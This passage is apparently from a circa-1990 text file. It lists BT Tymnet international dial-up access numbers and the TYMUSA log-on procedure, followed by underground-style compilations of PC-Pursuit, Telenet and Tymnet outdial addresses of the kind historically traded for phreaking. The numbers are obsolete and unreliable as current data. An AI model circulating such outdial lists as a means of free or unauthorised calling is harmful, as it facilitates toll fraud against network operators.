Paris E1 (1) 46-02-57-50 300/1200/2400
E1 (1) 46-02-55-00 1200/2400/mnp
E1 (1) 47-71-91-33 1200
E1 (1) 46-02-70-03 300/1200/2400/mnp
Lyon E1 (7) 89-30-17-3 300/1200/2400/mnp

Note: When dialing inter-country to France, all phone numbers are preceded by dialing (33). For BT Tymnet’s support center in Paris call: 1-49-11-21-21

————————————————————
ITALY
————————————————————
Milan E2 (2) 26-41-24-50 1200/2400

Note: When dialing inter-country to Italy, the phone number is preceded by (39).
————————————————————
JAPAN (NIS)
————————————————————
Akita * (188) 655735 300B
Akita * (188) 655733 1200B
Akita * (188) 655734 1200B/2400
Atsugi * (462) 215331 300B
Atsugi * (462) 210404 1200B/2400
Fukui * (776) 343308 300B
Fukui * (776) 358840 1200B/2400
Fukuoka * (92) 474-7076 300B
Fukuoka * (92) 474-7196 1200B/2400
Hamamatsu * (534) 567355 300B
Hamamatsu * (534) 567231 1200B/2400
Hiroshima * (82) 241-6857 300B
Hiroshima * (82) 243-9270 1200B/2400
Kagoshima * (992) 228598 300B
Kagoshima * (992) 228954 1200B
Kagoshima * (992) 229154 1200B/2400
Kanazawa * (762) 242351 300B
Kanazawa * (762) 242341 1200B/2400
Kohbe * (78) 242-1097 300B
Kohbe * (78) 242-1115 1200B/2400
Kumamoto * (96) 355-5233 300B
Kumamoto * (96) 354-3065 1200B/2400
Kyoto * (75) 431-6205 300B
Kyoto * (75) 431-6203 1200B/2400
Matsuyama * (899) 322975 300B
Matsuyama * (899) 324207 1200B/2400
Mito * (292) 241675 300B
Mito * (292) 244213 1200B/2400
Morioka * (196) 548513 300B
Morioka * (196) 547315 1200B/2400
Nagasaki * (958) 286088 300B
Nagasaki * (958) 286077 1200B/2400
Nagoya * (52) 204-2275 300B
Nagoya * (52) 204-1466 1200B/2400
Naha * (988) 614002 300B
Naha * (988) 613414 1200B/2400
Niigata * (25) 241-5409 300B
Niigata * (25) 241-5410 1200B/2400
Okayama * (862) 326760 300B
Okayama * (862) 314993 1200B/2400
Osaka * (6) 271-9028 300B
Osaka * (6) 271-9029 1200B
Osaka * (6) 271-6876 1200B/2400
Sapporo * (11) 281-4343 300B
Sapporo * (11) 281-4421 1200B/2400
Sendai * (22) 231-5741 300B
Sendai * (22) 231-5355 1200B/2400
Shizuoka * (542) 843393 300B
Shizuoka * (542) 843398 1200B/2400
Takamatsu * (878) 230502 300B
Takamatsu * (878) 230501 1200B/2400
Tokyo * (3) 555-9525 300B
Tokyo * (3) 555-9526 1200B
Tokyo * (3) 555-9696 2400
Toyama * (764) 417578 300B
Toyama * (764) 417769 1200B/2400
Tuchiura * (298) 555082 300B
Tuchiura * (298) 556121 1200B/2400
Urawa * (488) 339341 1200B/2400
Yokohama * (45) 453-7757 300B
Yokohama * (45) 453-7637 1200B/2400
For NIS customer service in Japan 24 hours a day call: (3) 551-6220
Note: When dialing inter-country to Japan, all phone numbers are preceded by dialing (81).
————————————————————
NETHERLANDS
————————————————————
Alkmaar E1 (72) 155190 300/1200/2400/mnp
Amsterdam E1 (20) 6610094 300/1200/1200-75
2400/9600/mnp
Eindhoven E1 (4902) 45530 300/1200/2400/mnp
The Hague E1 (70) 3814641 1200
E1 (70) 3475032 300/1200/2400/mnp
(70) 3818448 4800/9600/mnp
Rotterdam E1 (10)4532002 300/1200/1200-75
2400/9600/mnp
Note: When dialing inter-country to the Netherlands, all phone numbers are preceded by dialing (31). For BT Tymnet’s support center in the Netherlands call: (70) 3820044
————————————————————
SWEDEN
————————————————————
Stockholm E2 (8) 29-4782 300/1200/2400/mnp

Note: When dialing inter-country to Stockholm, the phone number is preceded by dialing (46). For BT Tymnet’s support center in Sweden call: (8) 98-8140
————————————————————
SWITZERLAND
————————————————————
Geneva E1 (22) 782-9329 300/1200/2400
Zurich E1 (1) 730-9673 1200/2400

Note: When dialing inter-country to Switzerland, all phone
numbers are preceded by dialing (41). For BT Tymnet’s support center in Switzerland call: (22) 782-5040
————————————————————
UNITED KINGDOM
————————————————————
Belfast E1 (232) 234467
Birmingham E1 (21) 632 6636
Bristol E1 (272) 255392
Cambridge E1 (223) 845860
Edinburgh E1 (31) 313 2172
Leeds E1 (532) 341838
London E1 (81) 566 7260
London E1 (71) 489 8571

Note: The preceding United Kingdom access numbers are scheduled to be available early August 1990. Please consult GNS customer support at 703/442-0145 or BT Tymnet’s support center in London at (582) 482 592 for more information.
Note: When dialing inter-country to the United Kingdom, all
phone numbers are preceded by dialing (44). The above access numbers will support 300-2400 V22 bis and MNP 4.
————————————————————
GERMANY
————————————————————
Cologne E1 (221)210196 300/1200/2400
Frankfurt E1 (69)666-8131 1200
E1 (69)668011 300
E1 (69)666-4021 300/1200
Munich E1 (89)350-7682 300/1200/2400
Note: When dialing inter-country to West Germany, all phone
numbers are preceded by dialing (49). For BT Tymnet’s
support center in West Germany call: (21) 159-6314

TYMUSA
Quick, easy access from around the world; a universal, simple and familiar log-on procedure (see below).
All communication charges are billed to the host in the USA by BT Tymnet.
TYMUSA is offered on BT Tymnet in-country nodes, PTT nodes using TYMNET technology (via a ‘T2’ Gateway) and PTT nodes using non-TYMNET technology (via an X.75 Gateway).
At dial-access locations using non-TYMNET technology, the service is referred to as TYMLINK. Log-on may vary from that of TYMUSA; however, all other features are the same. Variations in log-on are highlighted.
TYMUSA is offered in all BT Tymnet GNS countries at charge rate Band 1.

TYMUSA ACCESS COUNTRIES
COUNTRY
Access
City Band Number Comments
————————————————————
ANTIGUA
————————————————————
All Cities 3 809/462-0210 300B/1200B

Note: When dialing inter-country to Antigua, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
ARGENTINA
————————————————————
Buenos Aires 2 (1) 40-01-91 300
2 (1) 40-01-92 300
2 (1) 40-01-93 300
2 (1) 40-01-94 300
2 (1) 40-01-95 300
2 (1) 40-01-96 300
2 (1) 40-01-97 300
2 (1) 40-01-98 300
2 (1) 40-01-99 300

Note: When dialing inter-country to Argentina, all phone numbers are preceded by dialing (54).

COUNTRY
Access
City Band Number Comments
————————————————————
AUSTRIA
————————————————————
Vienna 2 (222) 50124 300
Vienna 2 (222) 50143 1200/2400
Outside Vienna 2 229015 1200/2400
2 229016 300/1200
2 229017 1200/2400

Note: Log-on “…” (cr) then TYMUSA log-on procedure. For additional log-on information please refer to BT Tymnet’s on-line information service.
Note: When dialing inter-country to Argentina, all phone numbers are preceded by dialing (43).
————————————————————
BAHAMAS
————————————————————
All Cities 3 809/323-7799 300B/1200B/2400

Note: When dialing inter-country to the Bahamas, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
BAHRAIN
————————————————————
All Cities 3 242525 300
3 245361 1200
Note: When dialing inter-country to Bahrain, all phone numbers are preceded by dialing (973).
————————————————————
BARBADOS
————————————————————
All Cities 3 809/426-7760 300B/1200B
Note: When dialing inter-country to Barbados, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
BERMUDA
————————————————————
All Cities 2 809/292-4327 300B/1200B
Note: When dialing inter-country to Bermuda, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
CAYMAN ISLANDS
————————————————————
All Cities 3 809/949-7100 300B/1200B

Note: When dialing inter-country to the Cayman Islands, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
DOMINICAN REPUBLIC
————————————————————
All Cities 3 809/685-6155 300B/1200B

Note: Use domestic log-on procedure.
Note: When dialing inter-country to the Dominican Republic, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
GUAM
————————————————————
Agana Heights * 477-2222 300/1200

Note: When dialing inter-country to Guam, the phone number is preceded by dialing (671).

————————————————————
GUATEMALA
————————————————————
Guatemala City 2 (2) 345-599 300B
2 (2) 345-999 1200B

Note: When dialing inter-country to Guatemala, all phone numbers are preceded by dialing (502).
————————————————————
HONDURAS
————————————————————
All Cities 2 320-544 300B/1200B

Note: When dialing inter-country to Honduras, the phone number is preceded by dialing (504).
————————————————————
HONG KONG
————————————————————
Hong Kong 2 865-7414 300B/1200B/2400
Note: Use domestic log-on procedure.
Note: When dialing inter-country to Hong Kong, the phone number is preceded by dialing (852).
————————————————————
ISRAEL
————————————————————
Afula 3 (6) 596658 300B/1200B/2400
Ashdod 3 (8) 542999 300B/1200B/2400
Bezeq 3 (57) 36029 300B/1200B/2400
Eilat 3 (59) 75147 300B/1200B/2400
Hadera 3 (6) 332409 300B/1200B/2400
Haifa 3 (4) 525421 300B/1200B/2400
3 (4) 673235 300B/1200B/2400
3 (4) 674203 300B/1200B/2400
3 (4) 674230 300B/1200B/2400
Herzeliya 3 (52) 545251 300B/1200B/2400
Jerusalem 3 (2) 242675 300B/1200B/2400
3 (2) 246363 300B/1200B/2400
3 (2) 248551 300B/1200B/2400
3 (2) 814396 300B/1200B/2400
Nahariya 3 (4) 825393 300B/1200B/2400
Netanya 3 (53) 348588 300B/1200B/2400
Rechovot 3 (8) 469799 300B/1200B/2400
Tel Aviv 3 (3) 203435 300B/1200B/2400
3 (3) 546-3837 300B/1200B/2400
3 (3) 751-2504 300B/1200B/2400
3 (3) 751-3799 300B/1200B/2400
3 (3) 752-0110 300B/1200B/2400
Tiberias 3 (6) 790274 300B/1200B/2400
Tzfat 3 (6) 973282 300B/1200B/2400

Note: For log-on information please refer to BT Tymnet’s on-line information service.
Note: When dialing inter-country to Israel, all phone numbers are preceded by dialing (972).
————————————————————
JAMAICA
————————————————————
All Cities 2 809/924-9915 300B/1200B

Note: When dialing inter-country to Jamaica, the phone number is preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
KOREA
————————————————————
Seoul 3 (2) 792-1455 1200

Note: Use domestic log-on procedure.
Note: When dialing inter-country to Korea, all phone numbers are preceded by dialing (82).

————————————————————
NETHERLANDS ANTILLES
————————————————————
Curacao 3 (9) 239251 300/1200
Curacao/St. Maarten 3 (Local Only) 0251 300/1200
Note: When dialing inter-country to the Netherlands Antilles, the phone number is preceded by dialing (599).
Note: The Curacao/St. Maarten access location is a local access location only. This location cannot be used for inter-city or inter-country access.
————————————————————
PANAMA
————————————————————
All Cities 3 639-055 300B/1200B
3 636-727 2400

Note: When dialing inter-country to Panama, all phone numbers are preceded by dialing (507).
————————————————————
PERU
————————————————————
Lima 4 (14) 240-478 1200

Note: When dialing inter-country to Peru, all phone numbers are preceded by dialing (51).
————————————————————
PUERTO RICO
————————————————————
Mayaguez/Ponce * 809/462-4213 300B/1200B
San Juan * 809/725-1882 300B/1200B
* 809/725-4343 300B/1200B
* 809/725-3501 300/1200
* 809/725-4702 300/1200
* 809/724-6070 2400
————————————————————
PHILIPPINES
————————————————————
Manila 2 (2) 819-1011 300
2 (2) 819-1009 300
2 (2) 819-1550 300
2 (2) 815-1553 300B/1200B
2 (2) 815-1555 300B/1200B
2 (2) 817-1791 300B/1200B
2 (2) 817-1581 300B/1200B
2 (2) 817-1796 300B/1200B
2 (2) 817-8811 300
2 (2) 521-7901 300

Note: When dialing inter-country to the Philippines, all phone numbers are preceded by dialing (63).
————————————————————
SAUDI ARABIA
————————————————————
Riyadh 5 (1) 4658803 1200
5 (1) 4631038 2400
Jeddah 5 (2) 6690708 1200
5 (2) 6691377 2400
Alkobar 5 (3) 8981025 1200

Note: For log-on information please refer to BT Tymnet’s on-line information service.
Note: When dialing inter-country to Saudi Arabia, all phone
numbers are preceded by dialing (966).
————————————————————
TRINIDAD & TOBAGO
————————————————————
All Cities 2 809/627-0854 300/1200
2 809/627-0855 300/1200

Note: When dialing inter-country to Trinidad and Tobago, all phone numbers are preceded by dialing (1). (If in USA/Canada, use above only.)
————————————————————
UNITED KINGDOM (British Telecom PSS)
————————————————————
Aberdeen 1 (224) 210701
Belfast 1 (232) 331284
Birmingham 1 (21) 633-3474
Bristol 1 (272) 211545
Cambridge 1 (223) 460127
Cardiff 1 (222) 344184
Chelmsford 1 (245) 491323
Edinburgh 1 (31) 313-2137
Exeter 1 (392) 421565
Glasgow 1 (41) 204-1722
Hastings 1 (424) 722788
Ipswich 1 (473) 210212
Kings Lynn 1 (553) 691090
Leamington 1 (926) 451419
Leeds 1 (532) 440024
Liverpool 1 (51) 255-0230
London 1 (71) 490-2200
Luton 1 (582) 481818
Manchester 1 (61) 834-5533
Newcastle 1 (91) 261-6858
Northampton 1 (604) 33395
Nottingham 1 (602) 506005
Oxford 1 (865) 798949
Plymouth 1 (752) 603302
Reading 1 (734) 500722
Southampton 1 (703) 634530

Note: When dialing inter-country to the United Kingdom, all phone numbers are preceded by dialing (44). The above access
numbers will support 300/1200/2400 bps.
The above numbers support
————————————————————
VIRGIN ISLANDS (U.S.)
————————————————————
St. Thomas 3 809/774-7099 300B
3 809/776-7084 1200B
————————————————————
TYMUSA Access Procedures
The following log-on procedures pertain to the countries listed on the previous pages:
First, dial up the access number provided for the specific country from the preceding list.
When you have established a network connection you will receive the following network prompt:
Please log in:

After the prompt, type the following:
Please log in: TYMUSA

This will establish the link to TYMNET. You will then receive another prompt from TYMNET at which time you should enter your username as in the example below:
Please log in: YOURUSERNAME
COUNTRIES WITH ACCESS TO AND FROM TYMNET
————————————-
Brazil, Chile, China, Costa Rica, Curacao,
Finland, French Antilles, French Guiana,
Gabon, Gambia, Hungary, Iceland, Indonesia,
Iraq, Ivory Coast, Liechtenstein,
Malaysia, Mexico, New Caledonia, New Zealand,
Norway, Portugal, Qatar, South Africa,
Thailand, Turkey, United Arab Emirates,
USSR, Zimbabwe.
——————————————————-
GALAXY INFORMATION NETWORK
Albuquerque, New Mexico
Contact: Customer Service 1 (505) 881-6988 (Voice)
1 (505) 881-6964 (Data)
——————————————————–
STARLINK
Albuquerque, New Mexico

Contact: Customer Service 1 (505) 881-6988 (Voice)
1 (505) 881-6964 (Data)
————————————————————

PC-Pursuit OutDials Originally Compiled By Ixom
+-New Jersey——————-+ +-Wisconsin——————–+
| 03110 201 00 001 1200 Baud | | 03110 414 00 020 300 Baud |
| 03110 201 00 022 2400 Baud | | 03110 414 00 021 1200 Baud |
| 03110 201 00 301 1200 Baud | | 03110 414 00 120 ???? Baud |
+-District of Columbia———+ +-California——————-+
| 03110 202 00 115 300 Baud | | 03110 415 00 005 2400 Baud |
| 03110 202 00 116 1200 Baud | | 03110 415 00 011 1200 Baud |
| 03110 202 00 117 2400 Baud | | 03110 415 00 023 ???? Baud |
+-Connecticut——————+ | 03110 415 00 108 300 Baud |
| 03110 203 00 105 2400 Baud | | 03110 415 00 109 1200 Baud |
| 03110 203 00 120 1200 Baud | | 03110 415 00 215 300 Baud |
| 03110 203 00 121 300 Baud | | 03110 415 00 216 1200 Baud |
+-Washington——————-+ | 03110 415 00 217 2400 Baud |
| 03110 206 00 205 300 Baud | | 03110 415 00 224 2400 Baud |
| 03110 206 00 206 1200 Baud | +-Oregon———————–+
| 03110 206 00 208 2400 Baud | | 03110 503 00 020 300 Baud |
+-New York———————+ | 03110 503 00 021 1200 Baud |
| 03110 212 00 028 2400 Baud | +-Arizona———————-+
| 03110 212 00 315 1200 Baud | | 03110 602 00 022 300 Baud |
+-California——————-+ | 03110 602 00 023 1200 Baud |
| 03110 213 00 023 ???? Baud | | 03110 602 00 026 2400 Baud |
| 03110 213 00 103 1200 Baud | +-Minnesota——————–+
| 03110 213 00 412 1200 Baud | | 03110 612 00 022 2400 Baud |
| 03110 213 00 413 2400 Baud | | 03110 612 00 120 300 Baud |
+-Texas————————+ | 03110 612 00 121 1200 Baud |
| 03110 214 00 022 ???? Baud | +-Massachusetts—————+
| 03110 214 00 117 300 Baud | | 03110 617 00 026 ???? Baud |
| 03110 214 00 118 1200 Baud | | 03110 617 00 311 300 Baud |
+-Pennsylvania—————–+ | 03110 617 00 313 1200 Baud |
| 03110 215 00 005 300 Baud | +-Texas————————+
| 03110 215 00 022 2400 Baud | | 03110 713 00 024 2400 Baud |
| 03110 215 00 112 1200 Baud | | 03110 713 00 113 300 Baud |
+-Ohio————————-+ | 03110 713 00 114 1200 Baud |
| 03110 216 00 020 300 Baud | +-California——————-+
| 03110 216 00 021 1200 Baud | | 03110 714 00 004 2400 Baud |
| 03110 216 00 120 2400 Baud | | 03110 714 00 023 300 Baud |
+-Colorado———————+ | 03110 714 00 024 1200 Baud |
| 03110 303 00 021 1200 Baud | | 03110 714 00 102 2400 Baud |
| 03110 303 00 114 300 Baud | | 03110 714 00 119 300 Baud |
| 03110 303 00 115 2400 Baud | | 03110 714 00 121 1200 Baud |
+-Florida———————-+ | 03110 714 00 210 300 Baud |
| 03110 305 00 120 300 Baud | | 03110 714 00 213 1200 Baud |
| 03110 305 00 121 1200 Baud | +-Utah————————-+
| 03110 305 00 122 2400 Baud | | 03110 801 00 012 2400 Baud |
+-Illinois———————+ | 03110 801 00 020 300 Baud |
| 03110 312 00 024 2400 Baud | | 03110 801 00 021 1200 Baud |
| 03110 312 00 410 300 Baud | +-Florida———————-+
| 03110 312 00 411 1200 Baud | | 03110 813 00 020 300 Baud |
+-Michigan———————+ | 03110 813 00 021 1200 Baud |
| 03110 313 00 024 2400 Baud | | 03110 813 00 124 2400 Baud |
| 03110 313 00 214 300 Baud | +-Missouri———————+
| 03110 313 00 216 1200 Baud | | 03110 816 00 104 300 Baud |
+-Missouri———————+ | 03110 816 00 113 1200 Baud |
| 03110 314 00 005 2400 Baud | +-California——————-+
| 03110 314 00 020 1200 Baud | | 03110 818 00 021 1200 Baud |
+-Alabama———————-+ +-California——————-+
| 03110 404 00 022 2400 Baud | | 03110 916 00 007 2400 Baud |
| 03110 404 00 113 300 Baud | | 03110 916 00 011 300 Baud |
| 03110 404 00 114 1200 Baud | | 03110 916 00 012 1200 Baud |
+-California——————-+ +-North Carolina—————+
| 03110 408 00 021 2400 Baud | | 03110 919 00 020 300 Baud |
| 03110 408 00 110 300 Baud | | 03110 919 00 021 1200 Baud |
| 03110 408 00 111 1200 Baud | | 03110 919 00 124 2400 Baud |
+——————————+ +——————————+

Other telenet outdials
311020600017, 311020600019, 311020600021, 311021200316,
311031400421, 311071400124, 311081600221

+-TymNet OutDials Sorted By Area Code–+——————————-Page 1-+
|NPA ST OUTDIAL CITY |NPA ST OUTDIAL CITY |
+————————————–+————————————–+
|201 NJ 03106 00 6319 Englewood Cliffs |507 MN 03106 00 1059 Rochester |
|201 NJ 03106 00 7618 Newark |508 MA 03106 00 1014 Groton |
|201 NJ 03106 00 2312 Paterson |508 MA 03106 00 1067 Leominster |
|201 NJ 03106 00 3319 Piscataway |508 MA 03106 00 531 Lowell |
|201 NJ 03106 00 6334 Red Bank |508 MA 03106 00 4001 Manchester |
|201 NJ 03106 00 4378 Union City |508 MA 03106 00 432 Marlborough |
|203 CT 03106 00 9128 Bloomfield |508 MA 03106 00 3520 Taunton |
|203 CT 03106 00 6472 Bridgeport |508 MA 03106 00 3456 Worcester |
|203 CT 03106 00 9128 Hartford |509 WA 03106 00 5298 Pullman |
|203 CT 03106 00 9126 New Haven |509 WA 03106 00 2116 Richland |
|203 CT 03106 00 7955 New London |509 WA 03106 00 8931 Yakima |
|203 CT 03106 00 9126 North Haven |512 TX 03106 00 1306 Austin |
|203 CT 03106 00 8071 Somers |512 TX 03106 00 424 Corpus Christi |
|203 CT 03106 00 9129 Stamford |512 TX 03106 00 2565 Lubbock |
|203 CT 03106 00 7962 Westport |512 TX 03106 00 9169 San Antonio |
|205 AL 03106 00 4101 Birmingham |512 TX 03106 00 1099 Texarkana |
|205 AL 03106 00 5641 Florence |513 OH 03106 00 1785 Cincinnati |
|205 AL 03106 00 8287 Gadsden |513 OH 03106 00 9511 Dayton |
|205 AL 03106 00 1258 Huntsville |516 NY 03106 00 582 Centereach |
|205 AL 03106 00 8829 Mobile |516 NY 03106 00 9193 Hempstead |
|205 AL 03106 00 3245 Montgomery |516 NY 03106 00 582 Lake Grove |
|205 AL 03106 00 2439 Northport |516 NY 03106 00 8811 Melville |
|205 AL 03106 00 1751 Opelika |517 MI 03106 00 4766 Freeland |
|205 AL 03106 00 2439 Tuscaloosa |517 MI 03106 00 9992 Lansing |
|206 WA 03106 00 1827 Auburn |517 MI 03106 00 4766 Midland |
|206 WA 03106 00 9170 Bellevue |518 NY 03106 00 9198 Albany |
|206 WA 03106 00 2745 Bellingham |601 MS 03106 00 1953 Gulfport |
|206 WA 03106 00 773 Bremerton |601 MS 03106 00 1164 Hattiesburg |
|206 WA 03106 00 2944 Longview |601 MS 03106 00 6301 Jackson |
|206 WA 03106 00 6113 Port Angeles |601 MS 03106 00 8598 Pascagoula |
|206 WA 03106 00 9170 Seattle |601 MS 03106 00 9901 Tupelo |
|206 WA 03106 00 159 Spokane |601 MS 03106 00 4405 Vicksburg |
|206 WA 03106 00 906 Tacoma |602 AZ 03106 00 6112 Flagstaff |
|206 WA 03106 00 5447 Vancouver |602 AZ 03106 00 9532 Mesa |
|207 ME 03106 00 4217 Portland |602 AZ 03106 00 9532 Phoenix |
|208 ID 03106 00 200 Boise |602 AZ 03106 00 4751 Tucson |
|208 ID 03106 00 1023 Coeur D’Alene |602 AZ 03106 00 3530 Yuma |
|208 ID 03106 00 3660 Idaho Falls |603 NH 03106 00 4027 Manchester |
|208 ID 03106 00 5151 Twin Falls |603 NH 03106 00 1347 Nashua |
|209 CA 03106 00 3996 Fresno |603 NH 03106 00 1696 North Hampton |
|209 CA 03106 00 8629 Merced |603 NH 03106 00 1554 Peterborough |
|209 CA 03106 00 2120 Modesto |603 NH 03106 00 6651 Portsmouth |
|209 CA 03106 00 3598 Visalia |606 KY 03106 00 9987 Lexington |
|212 NY 03106 00 1059 New York |607 NY 03106 00 5312 Binghamton |
|213 CA 03106 00 9203 El Segundo |608 WI 03106 00 5314 Beloit |
|213 CA 03106 00 3173 Inglewood |608 WI 03106 00 4200 Madison |
|213 CA 03106 00 9205 Long Beach |609 NJ 03106 00 5425 Atlantic City |
|214 TX 03106 00 2948 Dallas |609 NJ 03106 00 8693 Camden |
|214 TX 03106 00 8254 McKinney |609 NJ 03106 00 8693 Pennsauken |
|214 TX 03106 00 6248 Sherman |609 NJ 03106 00 8920 Princeton |
|214 TX 03106 00 8871 Texarkana |609 NJ 03106 00 8920 South Brunswick |
|215 PA 03106 00 3432 Bethlehem |609 NJ 03106 00 730 Trenton |
|215 PA 03106 00 7057 Coatesville |609 NJ 03106 00 3847 Vineland |
|215 PA 03106 00 508 Norristown |612 MN 03106 00 3494 Minneapolis |
|215 PA 03106 00 9581 Philadelphia |612 MN 03106 00 3494 St. Paul |
|216 OH 03106 00 8740 Akron |612 MN 03106 00 8335 St. Cloud |
|216 OH 03106 00 8160 Canton |614 OH 03106 00 9347 Columbus |
|216 OH 03106 00 4222 Cleveland |615 TN 03106 00 2937 Chattanooga |
|216 OH 03106 00 8859 Elyria |615 TN 03106 00 5720 Clarksville |
|216 OH 03106 00 3180 Warren |615 TN 03106 00 9985 Knoxville |
|216 OH 03106 00 4909 Youngstown |615 TN 03106 00 9141 Nashville |
+————————————–+————————————–+

+-TymNet OutDials Sorted By Area Code–+——————————-Page 2-+
|NPA ST OUTDIAL CITY |NPA ST OUTDIAL CITY |
+————————————–+————————————–+
|217 IL 03106 00 1119 Danville |615 TN 03106 00 9683 Oakridge |
|217 IL 03106 00 8900 Decatur |615 TN 03106 00 9114 Sevierville |
|217 IL 03106 00 5403 Springfield |616 MI 03106 00 1014 Battle Creek |
|217 IL 03106 00 9753 Urbana |616 MI 03106 00 4231 Benton Harbor |
|218 MN 03106 00 1093 Duluth |616 MI 03106 00 4017 Grand Rapids |
|219 IN 03106 00 2444 Elkhart |616 MI 03106 00 3195 Kalamazoo |
|219 IN 03106 00 3423 Ft.Wayne |616 MI 03106 00 4357 Muskegon |
|219 IN 03106 00 2705 Gary |617 MA 03106 00 7044 Bedford |
|219 IN 03106 00 5129 South Bend |617 MA 03106 00 8796 Boston |
|301 MD 03106 00 1058 Annapolis |617 MA 03106 00 8796 Cambridge |
|301 MD 03106 00 4600 Baltimore |617 MA 03106 00 1067 Kingston |
|301 MD 03106 00 999 Cumberland |618 IL 03106 00 8910 East St. Louis |
|301 MD 03106 00 1083 Myersville |618 IL 03106 00 3001 O’Fallon |
|301 MD 03106 00 552 Rockville |619 CA 03106 00 7859 Cathedral City |
|301 MD 03106 00 1020 Salisbury |619 CA 03106 00 7859 Palm Springs |
|302 DE 03106 00 7789 Dover |619 CA 03106 00 5416 Poway |
|302 DE 03106 00 1080 Georgetown |619 CA 03106 00 9183 San Diego |
|302 DE 03106 00 1784 Newark |619 CA 03106 00 4304 Vista |
|302 DE 03106 00 1784 Wilmington |702 NV 03106 00 342 Boulder City |
|303 CO 03106 00 2584 Aurora |702 NV 03106 00 2140 Carson City |
|303 CO 03106 00 2584 Boulder |702 NV 03106 00 342 Las Vegas |
|303 CO 03106 00 2584 Denver |702 NV 03106 00 2140 Reno |
|303 CO 03106 00 8737 Fort Collins |703 VA 03106 00 2262 Alexandria |
|303 CO 03106 00 6115 Grand Junction |703 VA 03106 00 2262 Arlington |
|303 CO 03106 00 7743 Greeley |703 VA 03106 00 2262 Fairfax |
|304 WV 03106 00 3431 Charleston |703 VA 03106 00 1014 Harrisonburg |
|304 WV 03106 00 1430 Huntington |703 VA 03106 00 4026 Roanoke |
|305 FL 03106 00 7123 Fort Lauderdale |704 NC 03106 00 0271 Asheville |
|305 FL 03106 00 7096 Longwood |704 NC 03106 00 6793 Charlotte |
|305 FL 03106 00 6582 Miami |704 NC 03106 00 7821 Kannapolis |
|305 FL 03106 00 7096 Orlando |707 CA 03106 00 4952 Fairfield |
|308 NE 03106 00 6997 Grand Island |707 CA 03106 00 1911 Moorpark |
|309 IL 03106 00 1149 Bloomington |707 CA 03106 00 4111 Santa Rosa |
|309 IL 03106 00 3614 Peoria |707 CA 03106 00 3830 Vallejo |
|309 IL 03106 00 5296 Rock Island |708 IL 03106 00 1094 Northfield |
|312 IL 03106 00 8257 Chicago |708 IL 03106 00 7005 Palatine |
|312 IL 03106 00 8944 Glen Ellyn |713 TX 03106 00 7758 Baytown |
|312 IL 03106 00 780 Lake Bluff |713 TX 03106 00 4562 Houston |
|313 MI 03106 00 209 Ann Arbor |714 CA 03106 00 9184 Anaheim |
|313 MI 03106 00 894 Burton |714 CA 03106 00 6294 Colton |
|313 MI 03106 00 8794 Detroit |714 CA 03106 00 4309 Diamond Bar |
|313 MI 03106 00 894 Flint |714 CA 03106 00 9184 Newport Beach |
|313 MI 03106 00 4847 Plymouth |714 CA 03106 00 6294 Riverside |
|313 MI 03106 00 4620 Port Huron |714 CA 03106 00 4447 San Clemente |
|313 MI 03106 00 3948 Southfield |714 CA 03106 00 5970 Upland |
|314 MO 03106 00 8978 Bridgeton |716 NY 03106 00 9194 Buffalo |
|314 MO 03106 00 6017 Columbia |716 NY 03106 00 6019 Pittsford |
|314 MO 03106 00 6182 Rolla |716 NY 03106 00 6019 Rochester |
|314 MO 03106 00 8978 St. Louis |717 PA 03106 00 7853 Lancaster |
|315 NY 03106 00 4710 Syracuse |717 PA 03106 00 1707 Lemoyne |
|315 NY 03106 00 1101 Utica |717 PA 03106 00 1572 Scranton |
|316 KS 03106 00 8013 Wichita |717 PA 03106 00 7941 Wilkes-Barre |
|317 IN 03106 00 9349 Indianapolis |719 CO 03106 00 2660 Denver |
|317 IN 03106 00 2646 Kokomo |801 UT 03106 00 801 Salt Lake City |
|317 IN 03106 00 4632 Marion |803 SC 03106 00 9907 Charleston |
|317 IN 03106 00 5032 Muncie |803 SC 03106 00 9993 Columbia |
|318 LA 03106 00 8525 Lafayette |803 SC 03106 00 9074 Greenville |
|318 LA 03106 00 4233 Lake Charles |803 SC 03106 00 9912 Myrtle Beach |
|401 RI 03106 00 9130 Providence |804 VA 03106 00 8215 Hampton |
|402 NE 03106 00 9856 Lincoln |804 VA 03106 00 2839 Lynchburg |
|402 NE 03106 00 2521 Omaha |804 VA 03106 00 7339 Midlothian |
+————————————–+————————————–+

+-TymNet OutDials Sorted By Area Code–+——————————-Page 3-+
|NPA ST OUTDIAL CITY |NPA ST OUTDIAL CITY |
+————————————–+————————————–+
|404 GA 03106 00 4829 Athens |804 VA 03106 00 8459 Newport News |
|404 GA 03106 00 8795 Atlanta |804 VA 03106 00 6986 Norfolk |
|404 GA 03106 00 4752 Columbus |804 VA 03106 00 1931 Petersburg |
|404 GA 03106 00 8795 Doraville |804 VA 03106 00 6986 Portsmouth |
|404 GA 03106 00 8795 Marietta |804 VA 03106 00 413 Richmond |
|404 GA 03106 00 0433 Martinez |804 VA 03106 00 4557 Williamsburg |
|404 GA 03106 00 8795 Norcross |805 CA 03106 00 3664 Bakersfield |
|404 GA 03106 00 1386 Rome |805 CA 03106 00 5991 Lancaster |
|405 OK 03106 00 1081 Enid |805 CA 03106 00 6116 Los Alamos |
|405 OK 03106 00 9165 Oklahoma City |805 CA 03106 00 5134 Moorpark |
|406 MT 03106 00 3740 Great Falls |805 CA 03106 00 4112 Port Hueneme |
|406 MT 03106 00 3504 Billings |805 CA 03106 00 2979 San Luis Obispo |
|407 FL 03106 00 5656 Boca Raton |805 CA 03106 00 6295 Santa Barbara |
|407 FL 03106 00 3720 Cocoa |805 CA 03106 00 6116 Santa Maria |
|407 FL 03106 00 5656 Delray Beach |806 TX 03106 00 8736 Amarillo |
|407 FL 03106 00 4701 Fort Pierce |806 TX 03106 00 4435 Lubbock |
|407 FL 03106 00 9900 Kissimmee |812 IN 03106 00 9323 Bloomington |
|407 FL 03106 00 9902 Port St. Lucie |812 IN 03106 00 3426 Evansville |
|407 FL 03106 00 9902 Stuart |813 FL 03106 00 4637 Clearwater |
|407 FL 03106 00 6181 Vero Beach |813 FL 03106 00 9453 Fort Myers |
|407 FL 03106 00 3326 West Palm Beach |813 FL 03106 00 116 Naples |
